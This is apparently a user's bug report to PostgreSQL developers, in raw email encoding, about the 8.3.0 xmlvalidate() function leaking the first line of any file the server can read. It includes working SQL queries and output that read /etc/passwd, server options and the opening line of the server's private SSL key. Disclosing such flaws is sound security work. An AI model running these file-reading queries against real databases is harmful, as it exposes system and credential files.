Hi, all
seb=3D> select version();
version
---------------------------------------------------------------------------=
-----------------------------------------
PostgreSQL 8.3.0 on x86_64-pc-linux-gnu, compiled by GCC=20
x86_64-pc-linux-gnu-gcc (GCC) 4.1.2 (Gentoo 4.1.2 p1.0.2)
xmlvalidate(xml, text) trying to read from file and if it is not correct -=
=20
notice error with first readed line. it is ok and good, but xmlvalidate can=
=20
read from _any_ file what DB process can access for read.
for example:
seb=3D> select xmlvalidate(xml('<a foo=3D"bar">test<b>message in=20
b</b></a>'), '/etc/passwd');
ERROR: could not load DTD
=D0=9F=D0=9E=D0=94=D0=A0=D0=9E=D0=91=D0=9D=D0=9E: /etc/passwd:1: parser er=
ror : Content error in the external subset
root:x:0:0:root:/root:/bin/bash
^
seb=3D> select xmlvalidate(xml('<a foo=3D"bar">test<b>message in=20
b</b></a>'), '../data/postmaster.opts');
ERROR: could not load DTD
=D0=9F=D0=9E=D0=94=D0=A0=D0=9E=D0=91=D0=9D=D0=9E: ../data/postmaster.opts:=
1: parser error : Content error in the=20
external subset
/usr/lib64/postgresql-8.3/bin/postgres -D /var/lib/postgresql/8.3/data --si=
lent-
^
first line from private server ssl key :)
seb=3D> select xmlvalidate(xml('<a foo=3D"bar">test<b>message in=20
b</b></a>'), '../data/server.key');
ERROR: could not load DTD
=D0=9F=D0=9E=D0=94=D0=A0=D0=9E=D0=91=D0=9D=D0=9E: ../data/server.key:1: pa=
rser error : Content error in the external=20
subset
-----BEGIN RSA PRIVATE KEY-----
^
i don't know is this bug or security issue or not...
